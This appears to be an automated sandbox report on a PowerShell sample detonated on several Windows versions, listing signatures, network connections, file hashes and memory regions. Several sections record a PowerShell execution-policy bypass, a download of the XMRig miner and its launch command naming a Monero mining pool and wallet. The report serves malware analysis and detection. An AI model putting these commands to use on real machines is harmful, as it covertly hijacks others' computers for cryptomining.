C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
Files
memory/4716-0-0x00007FFA49D23000-0x00007FFA49D25000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l2ua1ydw.wyj.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4716-10-0x0000021B7F4C0000-0x0000021B7F4E2000-memory.dmp
memory/4716-11-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp
memory/4716-12-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp
memory/4716-14-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp
memory/4716-15-0x0000021B7F490000-0x0000021B7F4A2000-memory.dmp
memory/4716-16-0x0000021B7DC50000-0x0000021B7DC5A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1356-47-0x0000016FEE310000-0x0000016FEE330000-memory.dmp
memory/1356-48-0x0000016FEE360000-0x0000016FEE380000-memory.dmp
memory/1356-49-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/4716-50-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp
memory/1356-51-0x0000016FEE380000-0x0000016FEE3A0000-memory.dmp
memory/1356-53-0x0000016FEE3A0000-0x0000016FEE3C0000-memory.dmp
memory/4716-52-0x00007FFA49D23000-0x00007FFA49D25000-memory.dmp
memory/1356-54-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/4716-55-0x00007FFA49D20000-0x00007FFA4A7E1000-memory.dmp
memory/1356-56-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-58-0x0000016FEE380000-0x0000016FEE3A0000-memory.dmp
memory/1356-57-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-59-0x0000016FEE3A0000-0x0000016FEE3C0000-memory.dmp
memory/1356-60-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-61-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-62-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-63-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-64-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-65-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-66-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-67-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-68-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-69-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-70-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-71-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-72-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-73-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-74-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-75-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-76-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-77-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-78-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-79-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-80-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-81-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-82-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-83-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-84-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-85-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-86-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-87-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-88-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-89-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-90-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-91-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-92-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-93-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-94-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-95-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-96-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-97-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-98-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-99-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-100-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-101-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-102-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-103-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-104-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-105-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-106-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-107-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-108-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-109-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-110-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-111-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-112-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-113-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-114-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-115-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-116-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-117-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
memory/1356-118-0x00007FF7CD9C0000-0x00007FF7CE5F3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:30
Platform
win11-20240508-en
Max time kernel
1712s
Max time network
1722s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 52.111.227.11:443 | tcp |
Files
memory/4836-0-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ilqk5kpr.jbl.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4836-9-0x0000021D45230000-0x0000021D45252000-memory.dmp
memory/4836-10-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp
memory/4836-11-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp
memory/4836-12-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp
memory/4836-13-0x00007FFB2CC90000-0x00007FFB2D752000-memory.dmp
memory/4836-14-0x00007FFB2CC93000-0x00007FFB2CC95000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:41
Platform
win7-20240221-en
Max time kernel
1562s
Max time network
1568s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"
Network
Files
memory/2956-4-0x000007FEF5D7E000-0x000007FEF5D7F000-memory.dmp
memory/2956-5-0x000000001B310000-0x000000001B5F2000-memory.dmp
memory/2956-6-0x0000000001DE0000-0x0000000001DE8000-memory.dmp
memory/2956-7-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
memory/2956-8-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
memory/2956-9-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
memory/2956-10-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
memory/2956-11-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
memory/2956-12-0x000007FEF5AC0000-0x000007FEF645D000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:29
Platform
win10-20240404-en
Max time kernel
1796s
Max time network
1802s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4732 wrote to memory of 4408 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4732 wrote to memory of 4408 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
Files
memory/4732-5-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp
memory/4732-4-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp
memory/4732-6-0x00000130E5380000-0x00000130E53A2000-memory.dmp
memory/4732-9-0x00000130FDAA0000-0x00000130FDB16000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uevzqsoh.brm.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4732-24-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp
memory/4732-47-0x00000130FDA80000-0x00000130FDA92000-memory.dmp
memory/4732-60-0x00000130E53B0000-0x00000130E53BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4408-89-0x000002D89AAE0000-0x000002D89AB00000-memory.dmp
memory/4408-90-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-91-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4732-92-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp
memory/4732-93-0x00007FFCDFBE0000-0x00007FFCDFDBB000-memory.dmp
memory/4408-94-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-95-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-96-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-97-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-98-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-99-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-100-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-101-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-102-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-103-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-104-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-105-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-106-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-107-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-108-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-109-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-110-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-111-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-112-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-113-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-114-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-115-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-116-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-117-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-118-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-119-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-120-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-121-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-122-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-123-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-124-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-125-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-126-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-127-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-128-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-129-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-130-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-131-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-132-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-133-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-134-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-135-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-136-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-137-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-138-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-139-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-140-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-141-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-142-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-143-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-144-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-145-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-146-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-147-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-148-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-149-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-150-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-151-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-152-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-153-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
memory/4408-154-0x00007FF7A0590000-0x00007FF7A11C3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:37
Platform
win11-20240426-en
Max time kernel
1798s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
